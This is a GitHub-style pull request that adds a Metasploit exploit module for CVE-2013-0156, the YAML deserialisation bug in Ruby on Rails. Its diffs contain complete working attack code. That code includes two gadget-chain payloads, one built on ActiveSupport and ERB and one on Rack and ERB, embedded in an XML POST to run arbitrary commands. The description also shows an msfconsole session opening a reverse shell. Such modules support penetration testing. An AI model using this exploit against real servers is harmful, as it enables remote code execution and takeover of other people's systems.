### PR TITLE
Add exploit module for CVE-2013-0156

### DIFF
--- a/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
+++ b/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
@@ -1,0 +1,96 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Rails qqq Remote Command Execution',
+			'Description'    => %q{
+					This module exploits a vulnerability qqq
+			},
+			'Author'         =>
+				[
+					'charliesome', # PoC
+					'espes' # PoC, Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2013-0156' ]
+				],
+			'Privileged'     => false, # web server context
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic ruby bash telnet'
+						}
+				},
+			'Platform'       => [ 'unix' ],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Jan 7 2013',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, "Rails path", "/" ])
+			], self.class)
+	end
+
+	def exploit
+
+		code = "`#{payload.encoded}`"
+
+		inner_payload = Rex::Text.encode_base64(
+			"\x04\x08" + 
+			"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
+				":\x0E@instance" +
+					"o"+":\x08ERB"+"\x06" + 
+						":\x09@src" +
+							Marshal.dump(code)[2..-1] +
+				":\x0C@method"+":\x0Bresult"
+		)
+
+		payload = <<-PAYLOAD.strip.gsub("\n", "&#10;")
+<lol type="yaml">
+--- !ruby/object:Gem::Requirement
+  requirements:
+  - !ruby/object:Rack::Session::Abstract::SessionHash
+    env:
+      HTTP_COOKIE: a=#{inner_payload}
+    by: !ruby/object:Rack::Session::Cookie
+      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
+      key: a
+      secrets: []
+    exists: true
+</lol>
+PAYLOAD
+		
+		res = send_request_cgi({
+			'uri'     => datastore['TARGETURI'],
+			'method'  => 'POST',
+			'ctype'   => "text/xml",
+			'data'    => payload
+		})
+
+		print_status("Sent exploit request")
+
+		if res and res.code != 200
+			print_error("Server returned non-200 status code (#{res.code})")
+		end
+	end
+
+end

--- a/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
+++ b/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
@@ -20,8 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'charliesome', # PoC
-					'espes' # PoC, Metasploit module
+					'benmmurphy', # PoC, better payload
+					'charliesome', # PoC work
+					'espes' # PoC work, Metasploit module
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -54,31 +55,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		code = "`#{payload.encoded}`"
 
-		inner_payload = Rex::Text.encode_base64(
-			"\x04\x08" + 
-			"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
-				":\x0E@instance" +
-					"o"+":\x08ERB"+"\x06" + 
-						":\x09@src" +
-							Marshal.dump(code)[2..-1] +
-				":\x0C@method"+":\x0Bresult"
-		)
-
 		payload = <<-PAYLOAD.strip.gsub("\n", "&#10;")
 <lol type="yaml">
 --- !ruby/object:Gem::Requirement
-  requirements:
-  - !ruby/object:Rack::Session::Abstract::SessionHash
-    env:
-      HTTP_COOKIE: a=#{inner_payload}
-    by: !ruby/object:Rack::Session::Cookie
-      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
-      key: a
-      secrets: []
-    exists: true
+  requirements: !ruby/object:Rack::Response
+    header: {}
+    body: []
+    block: !ruby/object:Rack::ShowStatus
+      app: !ruby/object:Rack::Cascade
+        apps: []
+      template: !ruby/object:ERB
+        src: !binary |-
+          #{Rex::Text.encode_base64(code)}
 </lol>
 PAYLOAD
-		
+
 		res = send_request_cgi({
 			'uri'     => datastore['TARGETURI'],
 			'method'  => 'POST',

--- a/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
+++ b/modules/exploits/unix/webapp/rails_xml_parsing_exec.rb
@@ -14,9 +14,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Rails qqq Remote Command Execution',
+			'Name'           => 'Rails XML Parsing Remote Command Execution',
 			'Description'    => %q{
-					This module exploits a vulnerability qqq
+					This module exploits a YAML deserialising vulnerability in Ruby on Rails <=
+				3.2.10, 3.1.9, 3.0.18 and 2.3.14.
+
+				A specially crafted YAML payload embedded inside an XML POST will be automatically
+				deserialised in any standard rails configuration. The YAML parser can create
+				arbitrary ruby objects which can be used to execute arbitrary code.
 			},
 			'Author'         =>
 				[


### PR DESCRIPTION
For no reason other than to beat you to it ;)
(hdmoore claimed they were pushing their own module in a couple hours time)

Tested with ruby 1.9.3 on Rails 3.2.10. Can probably be made to work on older ruby+rails versions, particularly using Gem::Requirement restricts it to 1.9.?.

A variation of @benmmurphy's payload is used, which he may or may not be comfortable with. I figure it's not _too_ difficult to come up with independently and my/@charliesome's hack would just be replaced by something similar eventually.

```
msf > use exploits/unix/webapp/rails_xml_parsing_exec
msf  exploit(rails_xml_parsing_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf  exploit(rails_xml_parsing_exec) > exploit

[*] Started reverse double handler
[*] Sent exploit request
[*] Accepted the first client connection...
[*] Accepted the second client connection...
```
